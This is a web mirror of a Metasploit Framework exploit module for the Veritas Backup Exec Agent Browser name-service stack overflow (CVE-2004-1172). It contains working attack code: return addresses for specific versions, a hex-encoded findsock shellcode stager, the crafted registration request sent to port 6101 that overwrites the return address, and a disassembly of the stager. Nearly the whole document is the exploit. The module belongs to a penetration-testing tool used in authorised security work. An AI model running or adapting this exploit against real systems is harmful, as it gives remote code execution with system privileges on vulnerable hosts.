Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/backupexec/name_service.rb
32425 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Veritas Backup Exec Name Service Overflow',

16
        'Description' => %q{

17
          This module exploits a vulnerability in the Veritas Backup

18
          Exec Agent Browser service. This vulnerability occurs when a

19
          recv() call has a length value too long for the	destination

20
          stack buffer. By sending an agent name value of 63 bytes or

21
          more, we can overwrite the return address of the recv

22
          function. Since we only have ~60 bytes of contiguous space

23
          for shellcode, a tiny findsock payload is sent which uses a

24
          hardcoded IAT address for the recv() function. This payload

25
          will then roll the stack back to the beginning of the page,

26
          recv() the real shellcode into it, and jump to it. This

27
          module has been tested against Veritas 9.1 SP0, 9.1 SP1, and

28
          8.6.

29
        },

30
        'Author' => [ 'hdm' ],

31
        'License' => MSF_LICENSE,

32
        'References' => [

33
          [ 'CVE', '2004-1172'],

34
          [ 'OSVDB', '12418'],

35
          [ 'BID', '11974'],

36
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],

37
        ],

38
        'Privileged' => true,

39
        'Payload' => {

40
          'Space' => 1024,

41
          'MinNops' => 512,

42
          'StackAdjustment' => -3500

43
        },

44
        'Targets' => [

45
          [

46
            'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101

47
            {

48
              'Platform' => 'win',

49
              'Rets' => [ 0x0142ffa1, 0x401150FF ] # [email protected] v9.1.4691.0 | [email protected]

50
            },

51
          ],

52
          [

53
            'Veritas BE 8.5',

54
            {

55
              'Platform' => 'win',

56
              'Rets' => [ 0x014308b9, 0x401138FF ] # [email protected] v8.50.3572 | [email protected] v8.50.3572

57
            },

58
          ],

59
        ],

60
        'DisclosureDate' => '2004-12-16',

61
        'DefaultTarget' => 0,

62
        'Notes' => {

63
          'Reliability' => UNKNOWN_RELIABILITY,

64
          'Stability' => UNKNOWN_STABILITY,

65
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

66
        }

67
      )

68
    )

69


70
    register_options(

71
      [

72
        Opt::RPORT(6101)

73
      ]

74
    )

75
  end

76


77
  def exploit

78
    connect

79


80
    print_status("Trying target #{target.name}...")

81


82
    # This will findsock/read the real shellcode (51 bytes, harcoded IAT for recv)

83
    # The IAT for recv() is for bnetns, the address is shifted by 8 bits to avoid

84
    # nulls: [0x00401150 -> 0x401150FF]

85
    stage_code = "\xfc" * 112

86
    stage_read =

87
      "\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74" +

88
      "\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11" +

89
      "\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75"

90


91
    # Configure the IAT for the recv call

92
    stage_read[29, 4] = [ target['Rets'][1] ].pack('V')

93


94
    # Stuff it all into one request

95
    stage_code[2, stage_read.length] = stage_read

96


97
    # Create the registration request

98
    req =

99
      "\x02\x00\x32\x00\x20\x00" + stage_code + "\x00" +

100
      "1.1.1.1.1.1\x00" + "\xeb\x81"

101


102
    print_status("Sending the agent registration request of #{req.length} bytes...")

103
    sock.put(req)

104


105
    print_status('Sending the payload stage down the socket...')

106
    sock.put(payload.encoded)

107


108
    print_status('Waiting for the payload to execute...')

109
    select(nil, nil, nil, 2)

110


111
    handler

112
    disconnect

113
  end

114
end

115


116


117
__END__

118
[ findsock stage ]

119
00000000  31F6              xor esi,esi

120
00000002  C1EC0C            shr esp,0xc

121
00000005  C1E40C            shl esp,0xc

122
00000008  89E7              mov edi,esp

123
0000000A  89FB              mov ebx,edi

124
0000000C  6A01              push byte +0x1

125
0000000E  8B7424FE          mov esi,[esp-0x2]

126
00000012  31D2              xor edx,edx

127
00000014  52                push edx

128
00000015  42                inc edx

129
00000016  C1E210            shl edx,0x10

130
00000019  52                push edx

131
0000001A  57                push edi

132
0000001B  56                push esi

133
0000001C  B8FF501140        mov eax,0x401150ff

134
00000021  C1E808            shr eax,0x8

135
00000024  FF10              call near [eax]

136
00000026  85C0              test eax,eax

137
00000028  7907              jns 0x31

138
0000002A  89DC              mov esp,ebx

139
0000002C  4E                dec esi

140
0000002D  85F6              test esi,esi

141
0000002F  75E1              jnz 0x12

142
00000031  FFD7              call edi

143


144